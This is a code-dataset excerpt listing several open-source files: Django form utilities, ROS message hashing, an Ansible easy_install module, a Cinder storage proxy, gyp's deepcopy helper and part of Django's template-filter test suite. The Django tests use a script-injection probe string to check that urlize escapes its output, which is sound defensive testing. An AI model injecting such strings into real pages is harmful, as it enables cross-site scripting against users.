repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
freeflightsim/fg-flying-club | google_appengine/lib/django/django/newforms/util.py | 32 | 2624 | from django.conf import settings
from django.utils.html import escape
# Converts a dictionary to a single string with key="value", XML-style with
# a leading space. Assumes keys do not need to be XML-escaped.
flatatt = lambda attrs: u''.join([u' %s="%s"' % (k, escape(v)) for k, v in attrs.items()])
def smart_unicode(s):
if not isinstance(s, basestring):
if hasattr(s, '__unicode__'):
s = unicode(s)
else:
s = unicode(str(s), settings.DEFAULT_CHARSET)
elif not isinstance(s, unicode):
s = unicode(s, settings.DEFAULT_CHARSET)
return s
class StrAndUnicode(object):
"""
A class whose __str__ returns its __unicode__ as a bytestring
according to settings.DEFAULT_CHARSET.
Useful as a mix-in.
"""
def __str__(self):
return self.__unicode__().encode(settings.DEFAULT_CHARSET)
class ErrorDict(dict):
"""
A collection of errors that knows how to display itself in various formats.
The dictionary keys are the field names, and the values are the errors.
"""
def __str__(self):
return self.as_ul()
def as_ul(self):
if not self: return u''
return u'<ul class="errorlist">%s</ul>' % ''.join([u'<li>%s%s</li>' % (k, v) for k, v in self.items()])
def as_text(self):
return u'\n'.join([u'* %s\n%s' % (k, u'\n'.join([u' * %s' % i for i in v])) for k, v in self.items()])
class ErrorList(list):
"""
A collection of errors that knows how to display itself in various formats.
"""
def __str__(self):
return self.as_ul()
def as_ul(self):
if not self: return u''
return u'<ul class="errorlist">%s</ul>' % ''.join([u'<li>%s</li>' % e for e in self])
def as_text(self):
if not self: return u''
return u'\n'.join([u'* %s' % e for e in self])
class ValidationError(Exception):
def __init__(self, message):
"ValidationError can be passed a string or a list."
if isinstance(message, list):
self.messages = ErrorList([smart_unicode(msg) for msg in message])
else:
assert isinstance(message, basestring), ("%s should be a basestring" % repr(message))
message = smart_unicode(message)
self.messages = ErrorList([message])
def __str__(self):
# This is needed because, without a __str__(), printing an exception
# instance would result in this:
# AttributeError: ValidationError instance has no attribute 'args'
# See http://www.python.org/doc/current/tut/node10.html#handling
return repr(self.messages)
| gpl-2.0 |
umbraclet16/ardupilot | mk/VRBRAIN/Tools/genmsg/src/genmsg/gentools.py | 51 | 6819 | #! /usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Library for supporting message and service generation for all ROS
client libraries. This is mainly responsible for calculating the
md5sums and message definitions of classes.
"""
# NOTE: this should not contain any rospy-specific code. The rospy
# generator library is rospy.genpy.
import sys
import hashlib
try:
from cStringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
from . import msgs
from .msgs import InvalidMsgSpec, MsgSpec, bare_msg_type, is_builtin
from .msg_loader import load_depends
from .srvs import SrvSpec
from . import names
from . import base
def compute_md5_text(msg_context, spec):
"""
Compute the text used for md5 calculation. MD5 spec states that we
removes comments and non-meaningful whitespace. We also strip
packages names from type names. For convenience sake, constants are
reordered ahead of other declarations, in the order that they were
originally defined.
:returns: text for ROS MD5-processing, ``str``
"""
package = spec.package
buff = StringIO()
for c in spec.constants:
buff.write("%s %s=%s\n"%(c.type, c.name, c.val_text))
for type_, name in zip(spec.types, spec.names):
msg_type = bare_msg_type(type_)
# md5 spec strips package names
if is_builtin(msg_type):
buff.write("%s %s\n"%(type_, name))
else:
# recursively generate md5 for subtype. have to build up
# dependency representation for subtype in order to
# generate md5
sub_pkg, _ = names.package_resource_name(msg_type)
sub_pkg = sub_pkg or package
sub_spec = msg_context.get_registered(msg_type)
sub_md5 = compute_md5(msg_context, sub_spec)
buff.write("%s %s\n"%(sub_md5, name))
return buff.getvalue().strip() # remove trailing new line
def _compute_hash(msg_context, spec, hash):
"""
subroutine of compute_md5()
:param msg_context: :class:`MsgContext` instance to load dependencies into/from.
:param spec: :class:`MsgSpec` to compute hash for.
:param hash: hash instance
"""
# accumulate the hash
# - root file
if isinstance(spec, MsgSpec):
hash.update(compute_md5_text(msg_context, spec).encode())
elif isinstance(spec, SrvSpec):
hash.update(compute_md5_text(msg_context, spec.request).encode())
hash.update(compute_md5_text(msg_context, spec.response).encode())
else:
raise Exception("[%s] is not a message or service"%spec)
return hash.hexdigest()
def compute_md5(msg_context, spec):
"""
Compute md5 hash for message/service
:param msg_context: :class:`MsgContext` instance to load dependencies into/from.
:param spec: :class:`MsgSpec` to compute md5 for.
:returns: md5 hash, ``str``
"""
return _compute_hash(msg_context, spec, hashlib.md5())
## alias
compute_md5_v2 = compute_md5
def _unique_deps(dep_list):
uniques = []
for d in dep_list:
if d not in uniques:
uniques.append(d)
return uniques
def compute_full_text(msg_context, spec):
"""
Compute full text of message/service, including text of embedded
types. The text of the main msg/srv is listed first. Embedded
msg/srv files are denoted first by an 80-character '=' separator,
followed by a type declaration line,'MSG: pkg/type', followed by
the text of the embedded type.
:param msg_context: :class:`MsgContext` instance to load dependencies into/from.
:param spec: :class:`MsgSpec` to compute full text for.
:returns: concatenated text for msg/srv file and embedded msg/srv types, ``str``
"""
buff = StringIO()
sep = '='*80+'\n'
# write the text of the top-level type
buff.write(spec.text)
buff.write('\n')
# append the text of the dependencies (embedded types). Can't use set() as we have to preserve order.
for d in _unique_deps(msg_context.get_all_depends(spec.full_name)):
buff.write(sep)
buff.write("MSG: %s\n"%d)
buff.write(msg_context.get_registered(d).text)
buff.write('\n')
# #1168: remove the trailing \n separator that is added by the concatenation logic
return buff.getvalue()[:-1]
def compute_full_type_name(package_name, file_name):
"""
Compute the full type name of message/service 'pkg/type'.
:param package_name: name of package file is in, ``str``
:file_name: name of the msg og srv file, ``str``
:returns: typename in format 'pkg/type'
:raises: :exc:`MsgGenerationException` if file_name ends with an unknown file extension
"""
# strip extension
for ext in (base.EXT_MSG, base.EXT_SRV):
if file_name.endswith(ext):
short_name = file_name[:-len(ext)]
break
else:
raise base.MsgGenerationException("Processing file: '%s' - unknown file extension"% (file_name))
return "%s/%s"%(package_name, short_name)
| gpl-3.0 |
ssssam/ansible-modules-core | packaging/language/easy_install.py | 73 | 6261 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Matt Wright <matt@nobien.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
import tempfile
import os.path
DOCUMENTATION = '''
---
module: easy_install
short_description: Installs Python libraries
description:
- Installs Python libraries, optionally in a I(virtualenv)
version_added: "0.7"
options:
name:
description:
- A Python library name
required: true
default: null
aliases: []
virtualenv:
description:
- an optional I(virtualenv) directory path to install into. If the
I(virtualenv) does not exist, it is created automatically
required: false
default: null
virtualenv_site_packages:
version_added: "1.1"
description:
- Whether the virtual environment will inherit packages from the
global site-packages directory. Note that if this setting is
changed on an already existing virtual environment it will not
have any effect, the environment must be deleted and newly
created.
required: false
default: "no"
choices: [ "yes", "no" ]
virtualenv_command:
version_added: "1.1"
description:
- The command to create the virtual environment with. For example
C(pyvenv), C(virtualenv), C(virtualenv2).
required: false
default: virtualenv
executable:
description:
- The explicit executable or a pathname to the executable to be used to
run easy_install for a specific version of Python installed in the
system. For example C(easy_install-3.3), if there are both Python 2.7
and 3.3 installations in the system and you want to run easy_install
for the Python 3.3 installation.
version_added: "1.3"
required: false
default: null
notes:
- Please note that the M(easy_install) module can only install Python
libraries. Thus this module is not able to remove libraries. It is
generally recommended to use the M(pip) module which you can first install
using M(easy_install).
- Also note that I(virtualenv) must be installed on the remote host if the
C(virtualenv) parameter is specified.
requirements: [ "virtualenv" ]
author: Matt Wright
'''
EXAMPLES = '''
# Examples from Ansible Playbooks
- easy_install: name=pip
# Install Bottle into the specified virtualenv.
- easy_install: name=bottle virtualenv=/webapps/myapp/venv
'''
def _is_package_installed(module, name, easy_install):
cmd = '%s --dry-run %s' % (easy_install, name)
rc, status_stdout, status_stderr = module.run_command(cmd)
return not ('Reading' in status_stdout or 'Downloading' in status_stdout)
def _get_easy_install(module, env=None, executable=None):
candidate_easy_inst_basenames = ['easy_install']
easy_install = None
if executable is not None:
if os.path.isabs(executable):
easy_install = executable
else:
candidate_easy_inst_basenames.insert(0, executable)
if easy_install is None:
if env is None:
opt_dirs = []
else:
# Try easy_install with the virtualenv directory first.
opt_dirs = ['%s/bin' % env]
for basename in candidate_easy_inst_basenames:
easy_install = module.get_bin_path(basename, False, opt_dirs)
if easy_install is not None:
break
# easy_install should have been found by now. The final call to
# get_bin_path will trigger fail_json.
if easy_install is None:
basename = candidate_easy_inst_basenames[0]
easy_install = module.get_bin_path(basename, True, opt_dirs)
return easy_install
def main():
arg_spec = dict(
name=dict(required=True),
virtualenv=dict(default=None, required=False),
virtualenv_site_packages=dict(default='no', type='bool'),
virtualenv_command=dict(default='virtualenv', required=False),
executable=dict(default='easy_install', required=False),
)
module = AnsibleModule(argument_spec=arg_spec, supports_check_mode=True)
name = module.params['name']
env = module.params['virtualenv']
executable = module.params['executable']
site_packages = module.params['virtualenv_site_packages']
virtualenv_command = module.params['virtualenv_command']
rc = 0
err = ''
out = ''
if env:
virtualenv = module.get_bin_path(virtualenv_command, True)
if not os.path.exists(os.path.join(env, 'bin', 'activate')):
if module.check_mode:
module.exit_json(changed=True)
command = '%s %s' % (virtualenv, env)
if site_packages:
command += ' --system-site-packages'
cwd = tempfile.gettempdir()
rc_venv, out_venv, err_venv = module.run_command(command, cwd=cwd)
rc += rc_venv
out += out_venv
err += err_venv
easy_install = _get_easy_install(module, env, executable)
cmd = None
changed = False
installed = _is_package_installed(module, name, easy_install)
if not installed:
if module.check_mode:
module.exit_json(changed=True)
cmd = '%s %s' % (easy_install, name)
rc_easy_inst, out_easy_inst, err_easy_inst = module.run_command(cmd)
rc += rc_easy_inst
out += out_easy_inst
err += err_easy_inst
changed = True
if rc != 0:
module.fail_json(msg=err, cmd=cmd)
module.exit_json(changed=changed, binary=easy_install,
name=name, virtualenv=env)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
NetApp/cinder | cinder/volume/drivers/nexenta/ns5/jsonrpc.py | 5 | 3097 | # Copyright 2011 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import json
import time
from oslo_log import log as logging
from oslo_serialization import jsonutils
import requests
from cinder import exception
LOG = logging.getLogger(__name__)
class NexentaJSONProxy(object):
def __init__(self, scheme, host, port, user,
password, auto=False, method=None):
self.scheme = scheme
self.host = host
self.port = port
self.user = user
self.password = password
self.auto = True
self.method = method
@property
def url(self):
return '%s://%s:%s/' % (self.scheme, self.host, self.port)
def __getattr__(self, method=None):
if method:
return NexentaJSONProxy(
self.scheme, self.host, self.port,
self.user, self.password, self.auto, method)
def __hash__(self):
return self.url.__hash__()
def __repr__(self):
return 'NEF proxy: %s' % self.url
def __call__(self, path, data=None):
auth = base64.b64encode(
('%s:%s' % (self.user, self.password)).encode('utf-8'))[:-1]
headers = {
'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth
}
url = self.url + path
if data:
data = jsonutils.dumps(data)
LOG.debug('Sending JSON to url: %s, data: %s, method: %s',
path, data, self.method)
resp = getattr(requests, self.method)(url, data=data, headers=headers)
if resp.status_code == 201 or (
resp.status_code == 200 and not resp.content):
LOG.debug('Got response: Success')
return 'Success'
response = json.loads(resp.content)
resp.close()
if response and resp.status_code == 202:
url = self.url + response['links'][0]['href']
while resp.status_code == 202:
time.sleep(1)
resp = requests.get(url)
if resp.status_code == 201 or (
resp.status_code == 200 and not resp.content):
LOG.debug('Got response: Success')
return 'Success'
else:
response = json.loads(resp.content)
resp.close()
if response.get('code'):
raise exception.NexentaException(response)
LOG.debug('Got response: %s', response)
return response
| apache-2.0 |
svn2github/gyp | pylib/gyp/simple_copy.py | 1869 | 1247 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
class Error(Exception):
pass
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
"""Deep copy operation on gyp objects such as strings, ints, dicts
and lists. More than twice as fast as copy.deepcopy but much less
generic."""
try:
return _deepcopy_dispatch[type(x)](x)
except KeyError:
raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy ' +
'or expand simple_copy support.' % type(x))
_deepcopy_dispatch = d = {}
def _deepcopy_atomic(x):
return x
for x in (type(None), int, long, float,
bool, str, unicode, type):
d[x] = _deepcopy_atomic
def _deepcopy_list(x):
return [deepcopy(a) for a in x]
d[list] = _deepcopy_list
def _deepcopy_dict(x):
y = {}
for key, value in x.iteritems():
y[deepcopy(key)] = deepcopy(value)
return y
d[dict] = _deepcopy_dict
del d
| bsd-3-clause |
bliti/django-nonrel-1.5 | tests/regressiontests/templates/filters.py | 52 | 30861 | # coding: utf-8
"""
Tests for template filters (as opposed to template tags).
The tests are hidden inside a function so that things like timestamps and
timezones are only evaluated at the moment of execution and will therefore be
consistent.
"""
from __future__ import unicode_literals
from datetime import date, datetime, time, timedelta
from django.test.utils import str_prefix
from django.utils.tzinfo import LocalTimezone, FixedOffset
from django.utils.safestring import mark_safe
from django.utils.encoding import python_2_unicode_compatible
# These two classes are used to test auto-escaping of __unicode__ output.
@python_2_unicode_compatible
class UnsafeClass:
def __str__(self):
return 'you & me'
@python_2_unicode_compatible
class SafeClass:
def __str__(self):
return mark_safe('you > me')
# RESULT SYNTAX --
# 'template_name': ('template contents', 'context dict',
# 'expected string output' or Exception class)
def get_filter_tests():
now = datetime.now()
now_tz = datetime.now(LocalTimezone(now))
now_tz_i = datetime.now(FixedOffset((3 * 60) + 15)) # imaginary time zone
today = date.today()
return {
# Default compare with datetime.now()
'filter-timesince01' : ('{{ a|timesince }}', {'a': datetime.now() + timedelta(minutes=-1, seconds = -10)}, '1 minute'),
'filter-timesince02' : ('{{ a|timesince }}', {'a': datetime.now() - timedelta(days=1, minutes = 1)}, '1 day'),
'filter-timesince03' : ('{{ a|timesince }}', {'a': datetime.now() - timedelta(hours=1, minutes=25, seconds = 10)}, '1 hour, 25 minutes'),
# Compare to a given parameter
'filter-timesince04' : ('{{ a|timesince:b }}', {'a':now - timedelta(days=2), 'b':now - timedelta(days=1)}, '1 day'),
'filter-timesince05' : ('{{ a|timesince:b }}', {'a':now - timedelta(days=2, minutes=1), 'b':now - timedelta(days=2)}, '1 minute'),
# Check that timezone is respected
'filter-timesince06' : ('{{ a|timesince:b }}', {'a':now_tz - timedelta(hours=8), 'b':now_tz}, '8 hours'),
# Regression for #7443
'filter-timesince07': ('{{ earlier|timesince }}', { 'earlier': now - timedelta(days=7) }, '1 week'),
'filter-timesince08': ('{{ earlier|timesince:now }}', { 'now': now, 'earlier': now - timedelta(days=7) }, '1 week'),
'filter-timesince09': ('{{ later|timesince }}', { 'later': now + timedelta(days=7) }, '0 minutes'),
'filter-timesince10': ('{{ later|timesince:now }}', { 'now': now, 'later': now + timedelta(days=7) }, '0 minutes'),
# Ensures that differing timezones are calculated correctly
'filter-timesince11' : ('{{ a|timesince }}', {'a': now}, '0 minutes'),
'filter-timesince12' : ('{{ a|timesince }}', {'a': now_tz}, '0 minutes'),
'filter-timesince13' : ('{{ a|timesince }}', {'a': now_tz_i}, '0 minutes'),
'filter-timesince14' : ('{{ a|timesince:b }}', {'a': now_tz, 'b': now_tz_i}, '0 minutes'),
'filter-timesince15' : ('{{ a|timesince:b }}', {'a': now, 'b': now_tz_i}, ''),
'filter-timesince16' : ('{{ a|timesince:b }}', {'a': now_tz_i, 'b': now}, ''),
# Regression for #9065 (two date objects).
'filter-timesince17' : ('{{ a|timesince:b }}', {'a': today, 'b': today}, '0 minutes'),
'filter-timesince18' : ('{{ a|timesince:b }}', {'a': today, 'b': today + timedelta(hours=24)}, '1 day'),
# Default compare with datetime.now()
'filter-timeuntil01' : ('{{ a|timeuntil }}', {'a':datetime.now() + timedelta(minutes=2, seconds = 10)}, '2 minutes'),
'filter-timeuntil02' : ('{{ a|timeuntil }}', {'a':(datetime.now() + timedelta(days=1, seconds = 10))}, '1 day'),
'filter-timeuntil03' : ('{{ a|timeuntil }}', {'a':(datetime.now() + timedelta(hours=8, minutes=10, seconds = 10))}, '8 hours, 10 minutes'),
# Compare to a given parameter
'filter-timeuntil04' : ('{{ a|timeuntil:b }}', {'a':now - timedelta(days=1), 'b':now - timedelta(days=2)}, '1 day'),
'filter-timeuntil05' : ('{{ a|timeuntil:b }}', {'a':now - timedelta(days=2), 'b':now - timedelta(days=2, minutes=1)}, '1 minute'),
# Regression for #7443
'filter-timeuntil06': ('{{ earlier|timeuntil }}', { 'earlier': now - timedelta(days=7) }, '0 minutes'),
'filter-timeuntil07': ('{{ earlier|timeuntil:now }}', { 'now': now, 'earlier': now - timedelta(days=7) }, '0 minutes'),
'filter-timeuntil08': ('{{ later|timeuntil }}', { 'later': now + timedelta(days=7, hours=1) }, '1 week'),
'filter-timeuntil09': ('{{ later|timeuntil:now }}', { 'now': now, 'later': now + timedelta(days=7) }, '1 week'),
# Ensures that differing timezones are calculated correctly
'filter-timeuntil10' : ('{{ a|timeuntil }}', {'a': now_tz_i}, '0 minutes'),
'filter-timeuntil11' : ('{{ a|timeuntil:b }}', {'a': now_tz_i, 'b': now_tz}, '0 minutes'),
# Regression for #9065 (two date objects).
'filter-timeuntil12' : ('{{ a|timeuntil:b }}', {'a': today, 'b': today}, '0 minutes'),
'filter-timeuntil13' : ('{{ a|timeuntil:b }}', {'a': today, 'b': today - timedelta(hours=24)}, '1 day'),
'filter-addslash01': ("{% autoescape off %}{{ a|addslashes }} {{ b|addslashes }}{% endautoescape %}", {"a": "<a>'", "b": mark_safe("<a>'")}, r"<a>\' <a>\'"),
'filter-addslash02': ("{{ a|addslashes }} {{ b|addslashes }}", {"a": "<a>'", "b": mark_safe("<a>'")}, r"<a>\' <a>\'"),
'filter-capfirst01': ("{% autoescape off %}{{ a|capfirst }} {{ b|capfirst }}{% endautoescape %}", {"a": "fred>", "b": mark_safe("fred>")}, "Fred> Fred>"),
'filter-capfirst02': ("{{ a|capfirst }} {{ b|capfirst }}", {"a": "fred>", "b": mark_safe("fred>")}, "Fred> Fred>"),
# Note that applying fix_ampsersands in autoescape mode leads to
# double escaping.
'filter-fix_ampersands01': ("{% autoescape off %}{{ a|fix_ampersands }} {{ b|fix_ampersands }}{% endautoescape %}", {"a": "a&b", "b": mark_safe("a&b")}, "a&b a&b"),
'filter-fix_ampersands02': ("{{ a|fix_ampersands }} {{ b|fix_ampersands }}", {"a": "a&b", "b": mark_safe("a&b")}, "a&amp;b a&b"),
'filter-floatformat01': ("{% autoescape off %}{{ a|floatformat }} {{ b|floatformat }}{% endautoescape %}", {"a": "1.42", "b": mark_safe("1.42")}, "1.4 1.4"),
'filter-floatformat02': ("{{ a|floatformat }} {{ b|floatformat }}", {"a": "1.42", "b": mark_safe("1.42")}, "1.4 1.4"),
# The contents of "linenumbers" is escaped according to the current
# autoescape setting.
'filter-linenumbers01': ("{{ a|linenumbers }} {{ b|linenumbers }}", {"a": "one\n<two>\nthree", "b": mark_safe("one\n<two>\nthree")}, "1. one\n2. <two>\n3. three 1. one\n2. <two>\n3. three"),
'filter-linenumbers02': ("{% autoescape off %}{{ a|linenumbers }} {{ b|linenumbers }}{% endautoescape %}", {"a": "one\n<two>\nthree", "b": mark_safe("one\n<two>\nthree")}, "1. one\n2. <two>\n3. three 1. one\n2. <two>\n3. three"),
'filter-lower01': ("{% autoescape off %}{{ a|lower }} {{ b|lower }}{% endautoescape %}", {"a": "Apple & banana", "b": mark_safe("Apple & banana")}, "apple & banana apple & banana"),
'filter-lower02': ("{{ a|lower }} {{ b|lower }}", {"a": "Apple & banana", "b": mark_safe("Apple & banana")}, "apple & banana apple & banana"),
# The make_list filter can destroy existing escaping, so the results are
# escaped.
'filter-make_list01': ("{% autoescape off %}{{ a|make_list }}{% endautoescape %}", {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list02': ("{{ a|make_list }}", {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list03': ('{% autoescape off %}{{ a|make_list|stringformat:"s"|safe }}{% endautoescape %}', {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
'filter-make_list04': ('{{ a|make_list|stringformat:"s"|safe }}', {"a": mark_safe("&")}, str_prefix("[%(_)s'&']")),
# Running slugify on a pre-escaped string leads to odd behavior,
# but the result is still safe.
'filter-slugify01': ("{% autoescape off %}{{ a|slugify }} {{ b|slugify }}{% endautoescape %}", {"a": "a & b", "b": mark_safe("a & b")}, "a-b a-amp-b"),
'filter-slugify02': ("{{ a|slugify }} {{ b|slugify }}", {"a": "a & b", "b": mark_safe("a & b")}, "a-b a-amp-b"),
# Notice that escaping is applied *after* any filters, so the string
# formatting here only needs to deal with pre-escaped characters.
'filter-stringformat01': ('{% autoescape off %}.{{ a|stringformat:"5s" }}. .{{ b|stringformat:"5s" }}.{% endautoescape %}',
{"a": "a<b", "b": mark_safe("a<b")}, ". a<b. . a<b."),
'filter-stringformat02': ('.{{ a|stringformat:"5s" }}. .{{ b|stringformat:"5s" }}.', {"a": "a<b", "b": mark_safe("a<b")},
". a<b. . a<b."),
# Test the title filter
'filter-title1' : ('{{ a|title }}', {'a' : 'JOE\'S CRAB SHACK'}, 'Joe's Crab Shack'),
'filter-title2' : ('{{ a|title }}', {'a' : '555 WEST 53RD STREET'}, '555 West 53rd Street'),
'filter-truncatewords01': ('{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}',
{"a": "alpha & bravo", "b": mark_safe("alpha & bravo")}, "alpha & ... alpha & ..."),
'filter-truncatewords02': ('{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}',
{"a": "alpha & bravo", "b": mark_safe("alpha & bravo")}, "alpha & ... alpha & ..."),
'filter-truncatechars01': ('{{ a|truncatechars:5 }}', {'a': "Testing, testing"}, "Te..."),
'filter-truncatechars02': ('{{ a|truncatechars:7 }}', {'a': "Testing"}, "Testing"),
# The "upper" filter messes up entities (which are case-sensitive),
# so it's not safe for non-escaping purposes.
'filter-upper01': ('{% autoescape off %}{{ a|upper }} {{ b|upper }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "A & B A & B"),
'filter-upper02': ('{{ a|upper }} {{ b|upper }}', {"a": "a & b", "b": mark_safe("a & b")}, "A & B A &AMP; B"),
'filter-urlize01': ('{% autoescape off %}{{ a|urlize }} {{ b|urlize }}{% endautoescape %}', {"a": "http://example.com/?x=&y=", "b": mark_safe("http://example.com?x=&y=")}, '<a href="http://example.com/?x=&y=" rel="nofollow">http://example.com/?x=&y=</a> <a href="http://example.com?x=&y=" rel="nofollow">http://example.com?x=&y=</a>'),
'filter-urlize02': ('{{ a|urlize }} {{ b|urlize }}', {"a": "http://example.com/?x=&y=", "b": mark_safe("http://example.com?x=&y=")}, '<a href="http://example.com/?x=&y=" rel="nofollow">http://example.com/?x=&y=</a> <a href="http://example.com?x=&y=" rel="nofollow">http://example.com?x=&y=</a>'),
'filter-urlize03': ('{% autoescape off %}{{ a|urlize }}{% endautoescape %}', {"a": mark_safe("a & b")}, 'a & b'),
'filter-urlize04': ('{{ a|urlize }}', {"a": mark_safe("a & b")}, 'a & b'),
# This will lead to a nonsense result, but at least it won't be
# exploitable for XSS purposes when auto-escaping is on.
'filter-urlize05': ('{% autoescape off %}{{ a|urlize }}{% endautoescape %}', {"a": "<script>alert('foo')</script>"}, "<script>alert('foo')</script>"),
'filter-urlize06': ('{{ a|urlize }}', {"a": "<script>alert('foo')</script>"}, '<script>alert('foo')</script>'),
# mailto: testing for urlize
'filter-urlize07': ('{{ a|urlize }}', {"a": "Email me at me@example.com"}, 'Email me at <a href="mailto:me@example.com">me@example.com</a>'),
'filter-urlize08': ('{{ a|urlize }}', {"a": "Email me at <me@example.com>"}, 'Email me at <<a href="mailto:me@example.com">me@example.com</a>>'),
'filter-urlizetrunc01': ('{% autoescape off %}{{ a|urlizetrunc:"8" }} {{ b|urlizetrunc:"8" }}{% endautoescape %}', {"a": '"Unsafe" http://example.com/x=&y=', "b": mark_safe('"Safe" http://example.com?x=&y=')}, '"Unsafe" <a href="http://example.com/x=&y=" rel="nofollow">http:...</a> "Safe" <a href="http://example.com?x=&y=" rel="nofollow">http:...</a>'),
'filter-urlizetrunc02': ('{{ a|urlizetrunc:"8" }} {{ b|urlizetrunc:"8" }}', {"a": '"Unsafe" http://example.com/x=&y=', "b": mark_safe('"Safe" http://example.com?x=&y=')}, '"Unsafe" <a href="http://example.com/x=&y=" rel="nofollow">http:...</a> "Safe" <a href="http://example.com?x=&y=" rel="nofollow">http:...</a>'),
'filter-wordcount01': ('{% autoescape off %}{{ a|wordcount }} {{ b|wordcount }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "3 3"),
'filter-wordcount02': ('{{ a|wordcount }} {{ b|wordcount }}', {"a": "a & b", "b": mark_safe("a & b")}, "3 3"),
'filter-wordwrap01': ('{% autoescape off %}{{ a|wordwrap:"3" }} {{ b|wordwrap:"3" }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "a &\nb a &\nb"),
'filter-wordwrap02': ('{{ a|wordwrap:"3" }} {{ b|wordwrap:"3" }}', {"a": "a & b", "b": mark_safe("a & b")}, "a &\nb a &\nb"),
'filter-ljust01': ('{% autoescape off %}.{{ a|ljust:"5" }}. .{{ b|ljust:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ".a&b . .a&b ."),
'filter-ljust02': ('.{{ a|ljust:"5" }}. .{{ b|ljust:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ".a&b . .a&b ."),
'filter-rjust01': ('{% autoescape off %}.{{ a|rjust:"5" }}. .{{ b|rjust:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b. . a&b."),
'filter-rjust02': ('.{{ a|rjust:"5" }}. .{{ b|rjust:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b. . a&b."),
'filter-center01': ('{% autoescape off %}.{{ a|center:"5" }}. .{{ b|center:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b . . a&b ."),
'filter-center02': ('.{{ a|center:"5" }}. .{{ b|center:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b . . a&b ."),
'filter-cut01': ('{% autoescape off %}{{ a|cut:"x" }} {{ b|cut:"x" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "&y &y"),
'filter-cut02': ('{{ a|cut:"x" }} {{ b|cut:"x" }}', {"a": "x&y", "b": mark_safe("x&y")}, "&y &y"),
'filter-cut03': ('{% autoescape off %}{{ a|cut:"&" }} {{ b|cut:"&" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "xy xamp;y"),
'filter-cut04': ('{{ a|cut:"&" }} {{ b|cut:"&" }}', {"a": "x&y", "b": mark_safe("x&y")}, "xy xamp;y"),
# Passing ';' to cut can break existing HTML entities, so those strings
# are auto-escaped.
'filter-cut05': ('{% autoescape off %}{{ a|cut:";" }} {{ b|cut:";" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
